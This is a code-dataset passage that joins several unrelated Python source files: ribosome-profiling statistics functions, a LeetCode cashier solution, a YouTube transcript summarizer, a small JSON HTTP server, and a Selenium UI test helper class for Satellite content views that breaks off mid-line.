remove_outliers = False):\n \"\"\"\n Fits a negative binomial GLM to the p-sites with a two-class frame feature (on or off-frame) and extracts the parameter for the frame coefficient. \n mat: 2D matrix with shape (ncodons, 3)\n returns: p-value\n \"\"\"\n\n df_glm = pd.DataFrame ({\n 'counts' : mat.reshape (-1),\n 'frame' : ['onframe', 'offframe', 'offframe'] * mat.shape[0]\n })\n\n try:\n\n if remove_outliers:\n\n theta_g = df_glm.groupby (\"frame\").agg ([np.mean, get_theta_ml])\n \n df_glm['pmf'] = pmf (df_glm.counts.values, theta_g.loc[df_glm.frame, ('counts','mean')], theta_g.loc[df_glm.frame, ('counts','get_theta_ml')])\n\n df_glm['adj_pmf'] = p_adjust_bh (df_glm.pmf)\n\n df_glm = df_glm[df_glm.adj_pmf >= 0.01]\n\n\n theta = get_theta_ml (df_glm.counts.values) \n model = smf.glm(formula = \"counts ~ frame\", data=df_glm, family=sm.families.NegativeBinomial(alpha=1/theta)).fit() \n glm_p = model.pvalues[1] # glm_ttest.pvalue\n\n # converting to one-tailed\n if model.params[1] > 0: #== max (model.params):\n glm_p_onetailed = glm_p/2\n else:\n glm_p_onetailed = 1-glm_p/2\n\n return (glm_p_onetailed)\n\n\n except sme.PerfectSeparationError:\n return (np.nan)\n except ValueError: \n return (np.nan)\n except IndexError:\n return (np.nan)\n\n\n\n\n\ndef p_adjust_bh (p):\n \"\"\"\n Benjamini-Hochberg p-value correction for multiple hypothesis testing.\n adapted from here: https://stackoverflow.com/questions/7450957/how-to-implement-rs-p-adjust-in-python to allow NaNs\n \"\"\"\n p = np.asfarray(p)\n \n nna = ~np.isnan (p)\n q = np.empty ((len(p)))\n q[:] = np.nan\n pnna = p[nna]\n\n by_descend = pnna.argsort()[::-1]\n by_orig = by_descend.argsort()\n\n n = len(pnna) #[~np.isnan (p)])\n i = np.arange(len(pnna), 0, -1)\n q[nna] = np.minimum(1, np.fmin.accumulate((float (n)/i) * pnna[by_descend]))[by_orig]\n return q\n \n\n\n\ndef get_filtered_padj (s, pcol=\"p_glm\", name=\"filtered_padj\"):\n \"\"\"\n Adapted from DESeq2; filtering by expression, the BH padjustment if performed solely on ORFs exceeding the expression threshold. \n Then, the threshold that maximized number of rejections (i.e. significant ORFs) are used. In contrast to DESeq2, the maximization is\n not based on lowess regression, but simply the cutoff with max rejections (lowess implementation TODO).\n \"\"\"\n \n filter=np.array (s['n'])\n p=np.array(s[pcol])\n nrows = s.shape[0]\n\n if nrows < 50: \n s[name] = p_adjust_bh(p) \n return (s)\n\n lq = np.mean(filter == 0)\n uq = .95 if lq < .95 else 1\n\n r = np.array (np.linspace(start=lq, stop=uq, num=50))\n\n cutoffs = np.quantile (filter, r)\n\n result = np.empty((nrows,len(cutoffs)))\n result[:] = np.nan\n\n for i in range (len (cutoffs)):\n \n use = filter >= cutoffs[i] \n \n if (np.any(use)):\n \n use_p = p[use] \n result[use, i] = p_adjust_bh(use_p) \n\n\n numRej = np.sum (result < 0.05, axis=0)\n j = np.argmax(numRej)\n\n s[name] = result[:,j]\n return (s)\n","repo_name":"ncrnalab/ribofy","sub_path":"ribofy/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37218601071","text":"class Cashier:\n def __init__(self, n: int, discount: int, products: 'List[int]', prices: 'List[int]'):\n self.gap = n\n self.cust_cnt = 0 # counter for the customer\n self.discount = discount\n self.prod = {} # the prod-price list\n i = 0\n while i < len(products):\n curr = products[i]\n if curr not in self.prod:\n self.prod[curr] = prices[i]\n i += 1\n\n def getBill(self, product: 'List[int]', amount: 'List[int]') -> float:\n total = 0\n i = 0\n while i < len(product):\n p = product[i]\n curr_charge = self.prod[p] * amount[i]\n total += curr_charge\n i += 1\n self.cust_cnt += 1\n if self.cust_cnt == self.gap:\n self.cust_cnt = 0\n total *= (1 - self.discount / 100)\n return total\n\n# Your Cashier object will be instantiated and called as such:\n# obj = Cashier(n, discount, products, prices)\n# param_1 = obj.getBill(product,amount)","repo_name":"renjieliu/leetcode","sub_path":"1001_1499/1357.py","file_name":"1357.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"73275391734","text":"\n# Import libraries \nfrom youtube_transcript_api import YouTubeTranscriptApi\nfrom youtube_transcript_api.formatters import JSONFormatter\n\nfrom transformers import pipeline\n\nurl = \"https://www.youtube.com/watch?v=Yiaatr-Noh0\"\nvideo_id = url.split(\"=\")[1]\n# print(video_id)\n\n# Must be a single transcript.\ntranscript = YouTubeTranscriptApi.get_transcript(video_id)\n\nformatter = JSONFormatter()\n\n# .format_transcript(transcript) turns the transcript into a JSON string.\njson_formatted = formatter.format_transcript(transcript, indent = 2)\n\n\n# Now we can write it out to a file.\n# Now, a new JSON file that you can easily read back into Python.\n\nwith open('youtube_transcript.json', 'w', encoding='utf-8') as json_file:\n json_file.write(json_formatted)\n\n# text is generated and stored it into r\nresult = \"\"\nfor i in transcript:\n result += ' ' + i['text']\n# print(result)\nprint(len(result))\n\n\n\n# # using pipeline API for summarization task\nsummarization = pipeline(\"summarization\")\n# original_text = result\n\nnum_iters = int(len(result)/1000)\nsummarized_text = []\nfor i in range(0, num_iters + 1):\n start = 0\n start = i * 1000\n end = (i + 1) * 1000\n # print(\"input text \\n\" + result[start:end])\n out = summarization(result[start:end])\n out = out[0]\n out = out['summary_text']\n # print(\"Summarized text\\n\"+out)\n summarized_text.append(out)\n\n#print(summarized_text)\n\n# summary_text = summarization(original_text)[0]['summary_text']\nprint(str(summarized_text))\nprint(len(summarized_text))\n\n\n\n\n\n# from transformers import T5ForConditionalGeneration, T5Tokenizer\n\n# # initialize the model architecture and weights\n# model = T5ForConditionalGeneration.from_pretrained(\"t5-base\")\n# # initialize the model tokenizer\n# tokenizer = T5Tokenizer.from_pretrained(\"t5-base\")\n\n# article = result\n\n# # encode the text into tensor of integers using the appropriate tokenizer\n# inputs = tokenizer.encode(\"summarize: \" + article, return_tensors=\"pt\", max_length=512, truncation=True)\n\n# # generate the summarization output\n# outputs = model.generate(\n# inputs, \n# max_length=250, \n# min_length=40, \n# length_penalty=5.0, \n# num_beams=4, \n# early_stopping=True)\n# # just for debugging\n# print(outputs)\n# print(tokenizer.decode(outputs[0]))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ShriyaBijam/Yo-script","sub_path":"transcript.py","file_name":"transcript.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27505398347","text":"#!/usr/bin/env python\n# coding=UTF-8\n\n\nimport socketserver\nfrom http.server import BaseHTTPRequestHandler\nfrom urllib.parse import urlparse\nimport urllib\nimport json\n\n\nclass ThreadedHTTPRequestHandler(BaseHTTPRequestHandler):\n dispatchers = {}\n\n\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.send_header(\"Access-Control-Request-Method\", \"*\")\n self.end_headers()\n\n def do_HEAD(self):\n self._set_headers()\n\n @classmethod\n def Register(self, path, fun):\n self.dispatchers[path] = fun\n\n def do_GET(self):\n self.log_message(\"in get method\")\n response = {}\n response['status'] = 'error'\n response['msg'] = 'get method is invalid'\n response = json.dumps(response, ensure_ascii=False)\n response = response.encode('utf-8')\n # send data\n self._set_headers()\n self.wfile.write(response)\n\n def do_POST(self):\n self.log_message(\"in post method\")\n data_string = self.rfile.read(int(self.headers['Content-Length']))\n print('post input :', data_string)\n # parse path\n o = urlparse(self.path)\n # parse data\n data_string = data_string.decode('utf-8')\n params = json.loads(data_string)\n # process\n if o.path in self.dispatchers:\n fun = self.dispatchers[o.path]\n response = fun(params)\n else:\n result = 'error url path: {}'.format(data_string)\n response = {}\n response['status'] = 'error'\n response['msg'] = result\n response = json.dumps(response, ensure_ascii=False)\n print('post output :', response)\n response = response.encode('utf-8')\n # send data\n self._set_headers()\n self.wfile.write(response)\n\n\nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n pass\n\n\nclass HttpServer:\n\n def __init__(self, host, port):\n self.server = ThreadedTCPServer(\n (host, port), ThreadedHTTPRequestHandler)\n\n def Register(self, path, fun):\n ThreadedHTTPRequestHandler.Register(path, fun)\n\n def Start(self):\n self.server.serve_forever()\n\n def ShutDown(self, *args):\n self.server.shutdown()","repo_name":"zhuwenbo1988/nlp","sub_path":"generative_chitchat/keyword_seq2seq/http_utils/http_server_py3.py","file_name":"http_server_py3.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38459401236","text":"# -*- encoding: utf-8 -*-\n\"\"\"Implements Content Views UI\"\"\"\n\nimport time\n\nfrom robottelo.constants import FILTER_ERRATA_DATE, FILTER_ERRATA_TYPE\nfrom robottelo.decorators import bz_bug_is_open\nfrom robottelo.ui.base import Base, UIError, UINoSuchElementError\nfrom robottelo.ui.locators import common_locators, locators, tab_locators\nfrom robottelo.ui.navigator import Navigator\n\n\nclass ContentViews(Base):\n \"\"\"Manipulates Content Views from UI\"\"\"\n is_katello = True\n\n def navigate_to_entity(self):\n \"\"\"Navigate to Content Views entity page\"\"\"\n Navigator(self.browser).go_to_content_views()\n\n def _search_locator(self):\n \"\"\"Specify locator for Content Views entity search procedure\"\"\"\n return locators[\"contentviews.key_name\"]\n\n def go_to_filter_page(self, cv_name, filter_name):\n \"\"\"Navigates UI to selected Filter page\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.assign_value(\n locators['contentviews.search_filters'], filter_name)\n self.click(common_locators['kt_search_button'])\n self.click(locators['contentviews.select_filter_name'] % filter_name)\n\n def set_calendar_date_value(self, name, value):\n \"\"\"Set the input value of a date field and press the button to hide\n the calendar popup panel\"\"\"\n self.assign_value(\n locators.contentviews.calendar_date_input % name,\n value\n )\n # the calendar panel popup and hide other form elements that became\n # unreachable.\n # close the popup calendar panel\n button = self.wait_until_element(\n locators.contentviews.calendar_date_button % name, timeout=2)\n if button:\n self.click(button)\n\n def create(self, name, label=None, description=None, is_composite=False):\n \"\"\"Creates a content view\"\"\"\n self.click(locators['contentviews.new'])\n self.assign_value(common_locators['name'], name)\n timeout = 60 if len(name) > 50 else 30\n self.wait_for_ajax(timeout)\n if label is not None:\n self.assign_value(common_locators['label'], label)\n if description is not None:\n self.assign_value(common_locators['description'], description)\n if is_composite:\n self.click(locators['contentviews.composite'])\n self.click(common_locators['create'])\n\n def move_affected_components(self, env, cv):\n \"\"\"Move affected components to another environment or content view.\n Activation keys and content hosts are examples of affected components.\n \"\"\"\n self.click(locators['contentviews.change_env'] % env)\n self.select(locators['contentviews.change_cv'], cv)\n self.click(locators['contentviews.next_button'])\n\n def delete_version(self, name, version):\n \"\"\"Deletes published content view's version\"\"\"\n self.search_and_click(name)\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators['contentviews.remove_ver'] % version)\n self.assign_value(\n locators['contentviews.completely_remove_checkbox'], True)\n self.click(locators['contentviews.next_button'])\n self.click(locators['contentviews.confirm_remove_ver'])\n\n def search_filter(self, cv_name, filter_name):\n \"\"\"Uses search box to locate the filters\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.assign_value(\n locators['contentviews.search_filters'], filter_name)\n self.click(common_locators['kt_search_button'])\n return self.wait_until_element(\n locators['contentviews.filter_name'] % filter_name)\n\n def update(self, name, new_name=None, new_description=None,\n force_puppet=None):\n \"\"\"Updates an existing content view\"\"\"\n self.search_and_click(name)\n self.click(tab_locators['contentviews.tab_details'])\n if new_name:\n self.edit_entity(\n locators['contentviews.edit_name'],\n locators['contentviews.edit_name_text'],\n new_name,\n locators['contentviews.save_name'],\n )\n if new_description:\n self.edit_entity(\n locators['contentviews.edit_description'],\n locators['contentviews.edit_description_text'],\n new_description,\n locators['contentviews.save_description']\n )\n if force_puppet is not None:\n self.edit_entity(\n locators['contentviews.edit_force_puppet'],\n locators['contentviews.edit_force_puppet_checkbox'],\n force_puppet,\n locators['contentviews.save_force_puppet']\n )\n\n def add_remove_repos(\n self, cv_name, repo_names, add_repo=True, repo_type='yum'):\n \"\"\"Add or Remove repository to/from selected content-view.\n\n When 'add_repo' Flag is set then add_repository will be performed,\n otherwise remove_repository\n \"\"\"\n self.search_and_click(cv_name)\n if repo_type == 'yum':\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_repo'])\n elif repo_type == 'docker':\n self.click(tab_locators['contentviews.tab_docker_content'])\n self.click(locators['contentviews.docker_repo'])\n elif repo_type == 'ostree':\n self.click(tab_locators['contentviews.tab_ostree_content'])\n locator = locators['contentviews.select_repo']\n for repo_name in repo_names:\n if add_repo:\n self.click(tab_locators['contentviews.tab_repo_add'])\n else:\n self.click(tab_locators['contentviews.tab_repo_remove'])\n self.assign_value(\n locators['contentviews.repo_search'], repo_name)\n self.click(common_locators['kt_search_button'])\n if not self.wait_until_element(locator % repo_name):\n raise UIError(\n 'Could not find repo \"{0}\" to add into CV'\n .format(repo_name)\n )\n self.click(locator % repo_name)\n if add_repo:\n self.click(locators['contentviews.add_repo'])\n self.click(tab_locators['contentviews.tab_repo_remove'])\n element = self.wait_until_element(locator % repo_name)\n if element is None:\n raise UINoSuchElementError(\n \"Adding repo {0} failed\".format(repo_name))\n else:\n self.click(locators['contentviews.remove_repo'])\n self.click(tab_locators['contentviews.tab_repo_add'])\n element = self.wait_until_element(locator % repo_name)\n if element is None:\n raise UINoSuchElementError(\n \"Removing repo {0} fails\".format(repo_name))\n\n def check_progress_bar_status(self, version):\n \"\"\"Checks the status of progress bar while publishing and promoting the\n CV to next environment\n \"\"\"\n timer = time.time() + 60 * 10\n strategy, value = locators['contentviews.publish_progress']\n check_progress = self.wait_until_element(\n (strategy, value % version),\n timeout=12,\n poll_frequency=2,\n )\n while check_progress and time.time() <= timer:\n check_progress = self.wait_until_element(\n (strategy, value % version),\n timeout=1,\n poll_frequency=0.5,\n )\n\n def publish(self, cv_name, description=None):\n \"\"\"Publishes to create new version of CV and promotes the contents to\n 'Library' environment\n \"\"\"\n self.search_and_click(cv_name)\n self.click(locators['contentviews.publish'])\n version_label = self.wait_until_element(\n locators['contentviews.ver_label'])\n version_number = self.wait_until_element(\n locators['contentviews.ver_num'])\n # To fetch the publish version e.g. 'Version 1'\n version = '{0} {1}'.format(version_label.text, version_number.text)\n if description:\n self.assign_value(\n locators['contentviews.publish_description'], description)\n self.click(common_locators['create'])\n self.check_progress_bar_status(version)\n return version\n\n def promote(self, cv_name, version, env):\n \"\"\"Promotes the selected version of content-view to given environment.\n \"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_versions'])\n self.click(locators['contentviews.promote_button'] % version)\n self.click(locators['contentviews.env_to_promote'] % env)\n self.click(locators['contentviews.promote_version'])\n self.check_progress_bar_status(version)\n return self.wait_until_element(\n locators['contentviews.version_status'] % version).text\n\n def add_puppet_module(self, cv_name, module_name, filter_term):\n \"\"\"Add puppet module to selected view either by its author name or by\n its version.\n\n Filter_term can be used to filter the module by 'author'\n or by 'version'.\n \"\"\"\n self.search_and_click(cv_name)\n if self.wait_until_element(\n tab_locators['contentviews.tab_puppet_modules']):\n self.click(tab_locators['contentviews.tab_puppet_modules'])\n else:\n raise UIError('Could not find tab to add puppet_modules')\n self.click(locators['contentviews.add_module'])\n self.assign_value(\n locators['contentviews.search_filters'], module_name)\n self.click(common_locators['kt_search_button'])\n self.click(locators['contentviews.select_module'] % module_name)\n self.assign_value(\n common_locators['kt_search'], filter_term)\n self.click(locators['contentviews.select_module_ver'] % filter_term)\n\n def add_remove_cv(self, composite_cv, cv_names, is_add=True):\n \"\"\"Add or Remove content-views to/from selected composite view.\n When 'is_add' Flag is set then add_contentView will be performed,\n otherwise remove_contentView\n \"\"\"\n self.search_and_click(composite_cv)\n if self.wait_until_element(\n tab_locators['contentviews.tab_content_views']):\n self.click(tab_locators['contentviews.tab_content_views'])\n else:\n raise UINoSuchElementError(\n 'Could not find ContentView tab, please make sure '\n 'selected view is composite'\n )\n for cv_name in cv_names:\n if is_add:\n self.click(tab_locators['contentviews.tab_cv_add'])\n else:\n self.click(tab_locators['contentviews.tab_cv_remove'])\n locator = locators['contentviews.select_cv']\n self.click(locator % cv_name)\n if is_add:\n self.click(locators['contentviews.add_cv'])\n self.click(tab_locators['contentviews.tab_cv_remove'])\n element = self.wait_until_element(locator % cv_name)\n if element is None:\n raise UINoSuchElementError(\n \"Adding CV {0} failed\".format(cv_name))\n else:\n self.click(locators['contentviews.remove_cv'])\n self.click(tab_locators['contentviews.tab_cv_add'])\n element = self.wait_until_element(locator % cv_name)\n if element is None:\n raise UINoSuchElementError(\n \"Removing CV {0} fails\".format(cv_name))\n\n def add_filter(self, cv_name, filter_name,\n content_type, filter_type, description=None):\n \"\"\"Creates content-view filter of given 'type'(include/exclude) and\n 'content-type'(package/package-group/errata)\n \"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n self.click(locators['contentviews.new_filter'])\n self.assign_value(common_locators['name'], filter_name)\n if content_type:\n self.select(locators['contentviews.content_type'], content_type)\n else:\n raise UIError(\n 'Could not create filter without content type'\n )\n if filter_type:\n self.select(locators['contentviews.type'], filter_type)\n else:\n raise UIError(\n 'Could not create filter without specifying filter '\n 'type'\n )\n if description:\n self.assign_value(common_locators['description'], description)\n self.click(common_locators['create'])\n\n def remove_filter(self, cv_name, filter_names):\n \"\"\"Removes selected filter from selected content-view.\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.content_filters'])\n\n # Workaround to remove previously used search string\n # from search box\n self.find_element(locators['contentviews.search_filters']).clear()\n self.click(common_locators['kt_search_button'])\n for filter_name in filter_names:\n self.click(\n locators['contentviews.select_filter_checkbox'] % filter_name)\n self.click(locators['contentviews.remove_filter'])\n\n def select_package_version_value(\n self, version_type, value1=None, value2=None):\n \"\"\"Select package version and set values: versions are: 'All' 'Equal\n To' 'Greater Than' 'Less Than' 'Range'.\n\n 'value1' should contain version value for types: 'Equal To' 'Greater\n Than' 'Less Than'.\n\n 'value2' should only be used with type 'Range' to define range of\n versions.\n \"\"\"\n if version_type == 'Equal To':\n self.assign_value(\n locators['contentviews.equal_value'], value1)\n elif version_type == 'Greater Than':\n self.assign_value(\n locators['contentviews.greater_min_value'], value1)\n elif version_type == 'Less Than':\n self.assign_value(\n locators['contentviews.less_max_value'], value1)\n elif version_type == 'Range':\n self.assign_value(\n locators['contentviews.greater_min_value'], value1)\n self.assign_value(\n locators['contentviews.less_max_value'], value2)\n else:\n raise UIError('Could not find valid version type')\n\n def add_packages_to_filter(self, cv_name, filter_name, package_names,\n version_types, values=None, max_values=None):\n \"\"\"Adds packages to selected filter for inclusion/Exclusion\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n for package_name, version_type, value, max_value in zip(\n package_names, version_types, values, max_values):\n self.click(locators['contentviews.add_rule'])\n self.assign_value(\n locators['contentviews.input_pkg_name'], package_name)\n self.select(\n locators['contentviews.select_pkg_version'], version_type)\n if not version_type == 'All Versions':\n self.select_package_version_value(\n version_type, value, max_value)\n self.click(locators['contentviews.add_pkg_button'])\n\n def remove_packages_from_filter(self, cv_name, filter_name, package_names):\n \"\"\"Removes selected packages from selected package type filter.\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n # On UI there's no attribute or text containing package name, just\n # disabled input with value set to package name after page loading (so\n # there's no @value attribute). This makes impossible to form xpath for\n # specific package and the only remaining option is to locate all the\n # packages and select only the one whose input contains desired value\n packages = self.find_elements(locators['contentviews.packages'])\n checkboxes = [\n package.find_element(*locators['contentviews.package_checkbox'])\n for package in packages\n if package.get_attribute('value') in package_names\n ]\n for checkbox in checkboxes:\n self.click(checkbox)\n self.click(locators['contentviews.remove_packages'])\n\n def update_package_filter(self, cv_name, filter_name, package_name,\n version_type=None, version_value=None,\n new_package_name=None, new_version_type=None,\n new_version_value=None):\n \"\"\"Update package in a filter\"\"\"\n version_types = {\n 'Equal To': 'equal',\n 'Greater Than': 'greater',\n 'Less Than': 'less',\n 'Range': 'range',\n 'All Versions': 'all',\n }\n self.go_to_filter_page(cv_name, filter_name)\n # As it's impossible to obtain specific filter directly,\n # getting all the package filters first\n packages = self.find_elements(locators['contentviews.packages'])\n # Then selecting the filters with the same package as passed\n packages = [\n package for package in packages\n if package.get_attribute('value') == package_name\n ]\n # As there can be multiple filters for the same package, user may want\n # to specify version type and version of package filter\n # If version type was passed - filter package list by version type\n if version_type:\n packages = [\n package for package in packages\n if package.find_element(\n *locators['contentviews.package_version_type']\n ).get_attribute('value') == version_types[version_type]\n ]\n # If version was passed - filter package list by version\n if version_value:\n packages = [\n package for package in packages\n if package.find_element(\n *locators['contentviews.package_version_value']\n ).get_attribute('value') == version_value\n ]\n # What's left in package list is probably our package, let's work with\n # it\n if packages:\n package = packages[0]\n # But if package list is empty - notify user he specified something\n # wrong\n else:\n raise UINoSuchElementError('Package filter not found')\n # Now just usual stuff - clicking 'edit' button, updating corresponding\n # fields and clicking 'save' button\n self.click(\n package.find_element(*locators['contentviews.package_edit']))\n if new_package_name:\n self.assign_value(package, new_package_name)\n if new_version_type:\n self.assign_value(\n package.find_element(\n *locators['contentviews.package_version_type']),\n new_version_type\n )\n if new_version_value:\n self.assign_value(\n package.find_element(\n *locators['contentviews.package_version_value']),\n new_version_value\n )\n self.click(\n package.find_element(*locators['contentviews.package_save']))\n\n def update_filter_affected_repos(self, cv_name, filter_name,\n new_affected_repos):\n \"\"\"Update affected repos of content view filter\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n self.click(tab_locators['contentviews.tab_filter_affected_repos'])\n self.assign_value(\n locators['contentviews.affected_repos_radio'], True)\n all_repo_checkboxes = self.find_elements(\n locators['contentviews.affected_repos_checkboxes'])\n # Uncheck all the repos first\n for checkbox in all_repo_checkboxes:\n self.assign_value(checkbox, False)\n # Check off passed repos\n for repo_name in new_affected_repos:\n self.assign_value(\n locators['contentviews.affected_repo_checkbox'] % repo_name,\n True\n )\n self.click(locators['contentviews.filter_update_repos'])\n\n def add_remove_package_groups_to_filter(self, cv_name, filter_name,\n package_groups, is_add=True):\n \"\"\"Add/Remove package groups to/from selected filter for\n inclusion/Exclusion.\n \"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n if is_add:\n self.click(tab_locators['contentviews.tab_pkg_group_add'])\n else:\n self.click(tab_locators['contentviews.tab_pkg_group_remove'])\n for package_group in package_groups:\n self.click(\n locators['contentviews.select_pkg_group_checkbox']\n % package_group\n )\n if is_add:\n self.click(locators['contentviews.add_pkg_group'])\n else:\n self.click(locators['contentviews.remove_pkg_group'])\n\n def add_remove_errata_to_filter(self, cv_name, filter_name,\n errata_ids=None, select_all=None,\n is_add=True):\n \"\"\"Add/Remove errata to/from selected filter for inclusion/exclusion\n\n :param str cv_name: Name of content view\n :param str filter_name: Name of content view filter\n :param list optional errata_ids: list of specific errata ids to add or\n remove\n :param bool optional select_all: whether to check off 'Select All'\n checkbox to select all available errata\n :param bool is_add: `True` for adding and `False` for removing errata\n to/from filter\n \"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n if is_add:\n self.click(tab_locators['contentviews.tab_add'])\n else:\n self.click(tab_locators['contentviews.tab_remove'])\n if errata_ids is not None:\n for errata_id in errata_ids:\n self.click(\n locators.contentviews.select_errata_checkbox % errata_id)\n if select_all is not None:\n self.assign_value(\n common_locators.table_select_all_checkbox, select_all)\n if is_add:\n self.click(locators['contentviews.add_errata'])\n else:\n self.click(locators['contentviews.remove_errata'])\n\n def edit_erratum_date_range_filter(\n self, cv_name, filter_name, errata_types=None, date_type=None,\n start_date=None, end_date=None, open_filter=True):\n \"\"\"Edit Erratum Date Range Filter\"\"\"\n allowed_errata_types = FILTER_ERRATA_TYPE.values()\n allowed_date_types = FILTER_ERRATA_DATE.values()\n if open_filter:\n self.go_to_filter_page(cv_name, filter_name)\n if errata_types is not None:\n if not errata_types:\n raise UIError(\n 'errata types is empty, minimum required: one errata type'\n )\n if not set(errata_types).issubset(allowed_errata_types):\n raise UIError('some types in errata_types are not allowed')\n # because of the behaviour of the UI to disable the last checked\n # element.\n # will check all selected errata types first, after then uncheck\n # the not selected ones.\n # 1 - check first the types that are in the errata_types\n for errata_type in errata_types:\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n True\n )\n # we are sure now that any check box not in the errata_types\n # is enabled and clickable\n # 2 - uncheck the types that are not in the selection\n for errata_type in set(allowed_errata_types).difference(\n errata_types):\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n False\n )\n if date_type is not None:\n if date_type not in allowed_date_types:\n raise UIError('date type \"{0}\" not allowed'.format(date_type))\n self.click(locators.contentviews.erratum_date_type % date_type)\n if start_date is not None:\n self.set_calendar_date_value('start_date', start_date)\n if end_date is not None:\n self.set_calendar_date_value('end_date', end_date)\n self.click(locators.contentviews.save_erratum)\n\n def edit_erratum_id_filter(\n self, cv_name, filter_name, errata_types=None, open_filter=True):\n \"\"\"Edit Erratum by ID Filter\"\"\"\n allowed_errata_types = FILTER_ERRATA_TYPE.values()\n if open_filter:\n self.go_to_filter_page(cv_name, filter_name)\n self.click(tab_locators.contentviews.tab_add)\n if errata_types is not None:\n if not errata_types:\n raise UIError(\n 'errata types is empty, minimum required: one errata type'\n )\n if not set(errata_types).issubset(allowed_errata_types):\n raise UIError('some types in errata_types are not allowed')\n # because of the behaviour of the UI to disable the last checked\n # element.\n # will check all selected errata types first, after then uncheck\n # the not selected ones.\n # 1 - check first the types that are in the errata_types\n for errata_type in errata_types:\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n True\n )\n # we are sure now that any check box not in the errata_types\n # is enabled and clickable\n # 2 - uncheck the types that are not in the selection\n for errata_type in set(allowed_errata_types).difference(\n errata_types):\n self.assign_value(\n locators.contentviews.erratum_type_checkbox % errata_type,\n False\n )\n\n def fetch_erratum_date_range_filter_values(self, cv_name, filter_name):\n \"\"\"Fetch Content View Erratum Date Range Filter values\"\"\"\n self.go_to_filter_page(cv_name, filter_name)\n result = {\n 'date_type': None,\n 'end_date': None,\n 'start_date': None,\n 'types': [],\n }\n for errata_type in FILTER_ERRATA_TYPE.values():\n if self.wait_until_element(\n locators['contentviews.erratum_type_checkbox'] % errata_type\n ).is_selected():\n result['types'].append(errata_type)\n for date_type in FILTER_ERRATA_DATE.values():\n if self.wait_until_element(\n locators['contentviews.erratum_date_type'] % date_type\n ).is_selected():\n result['date_type'] = date_type\n break\n result['start_date'] = self.wait_until_element(\n locators['contentviews.calendar_date_input'] % 'start_date'\n ).get_attribute('value')\n result['end_date'] = self.wait_until_element(\n locators['contentviews.calendar_date_input'] % 'end_date'\n ).get_attribute('value')\n return result\n\n def fetch_puppet_module(self, cv_name, module_name):\n \"\"\"Get added puppet module name from selected content-view\"\"\"\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_puppet_modules'])\n self.assign_value(common_locators['kt_search'], module_name)\n self.click(common_locators['kt_search_button'])\n return self.wait_until_element(\n locators['contentviews.get_module_name'] % module_name)\n\n def copy_view(self, name, new_name):\n \"\"\"Copies an existing Content View.\"\"\"\n self.search_and_click(name)\n self.perform_entity_action('Copy')\n self.assign_value(common_locators['copy_name_input'], new_name)\n self.click(common_locators['copy_create_button'])\n\n def fetch_yum_content_repo_name(self, cv_name):\n \"\"\"Fetch associated yum repository info from selected content view.\"\"\"\n # find content_view\n self.search_and_click(cv_name)\n self.click(tab_locators['contentviews.tab_yum_content'])\n self.click(locators['contentviews.yum_repositories'])\n if self.wait_until_element(locators['contentviews.repo_name']):\n return self.find_element(locators['contentviews.repo_name']).text\n else:\n raise UINoSuchElementError(\n 'Could not get text attribute of repository locator')\n\n def validate_version_deleted(self, cv_name, version):\n \"\"\"Ensures the version is deleted from selected CV\"\"\"\n self.search_and_click(cv_name)\n removed_version = self.find_element(\n locators['contentviews.version_name'] % version)\n if removed_version:\n raise UIError(\n 'Selected version \"{0}\" was not deleted successfully'\n .format(version)\n )\n\n def validate_version_cannot_be_deleted(self, name, version):\n \"\"\"Check that version cannot be deleted from selected CV, because it\n has activation key or content host assigned to it\n \"\"\"\n self.search_and_click(name)\n self.click(locators['contentviews.version_dropdown'] % version)\n self.click(locators['contentviews.remove_ver'] % version)\n self.click(locators['contentviews.next_button'])\n self.wait_until_element(locators['contentviews.affected_button'])\n self.wait_for_ajax()\n self.wait_until_element(locators['contentviews.next_button'])\n self.wait_for_ajax()\n if self.is_element_enabled(locators['contentviews.next_button']):\n raise UIError(\n '\"Next\" button is enabled when it should not'\n )\n\n def version_search(self, name, version_name):\n \"\"\"Search for version in content view\"\"\"\n self.search_and_click(name)\n self.click(tab_locators['contentviews.tab_versions'])\n if not bz_bug_is_open(1400535):\n self.assign_value(\n common_locators['kt_table_search'], version_name)\n self.click(common_locators['kt_table_search_button'])\n return self.wait_until_element(\n locators['contentviews.version_name'] % version_name)\n\n def package_search(self, name, version_name, package_name,\n package_version=None):\n \"\"\"Search for package in content view version\"\"\"\n self.click(self.version_search(name, version_name))\n self.click(tab_locators['contentviews.tab_version_packages'])\n # type package version alongside with package name into search field if\n # it was passed\n self.assign_value(\n common_locators.kt_search,\n package_name if not package_version else\n 'name = \"{}\" and version = \"{}\"'.format(\n 